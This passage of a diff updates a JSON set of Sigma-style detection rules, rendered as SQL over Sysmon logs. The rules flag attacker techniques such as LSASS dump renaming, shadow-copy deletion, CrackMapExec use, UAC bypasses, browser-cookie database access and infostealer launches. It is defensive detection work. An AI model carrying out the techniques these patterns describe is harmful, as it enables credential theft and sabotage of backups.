CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_where_browser_data_recon.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218.010" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR 
CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "status": "test", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Unlikely" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", - "author": "frack113", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' 
ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious 
scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "title": 
"Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Unknown" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - 
"description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' 
OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Potential Encoded PowerShell Patterns In CommandLine", - "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "status": "test", - "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "status": "experimental", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR 
CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encoding_patterns.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "status": "experimental", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", - "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "status": "experimental", + "description": 
"Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": 
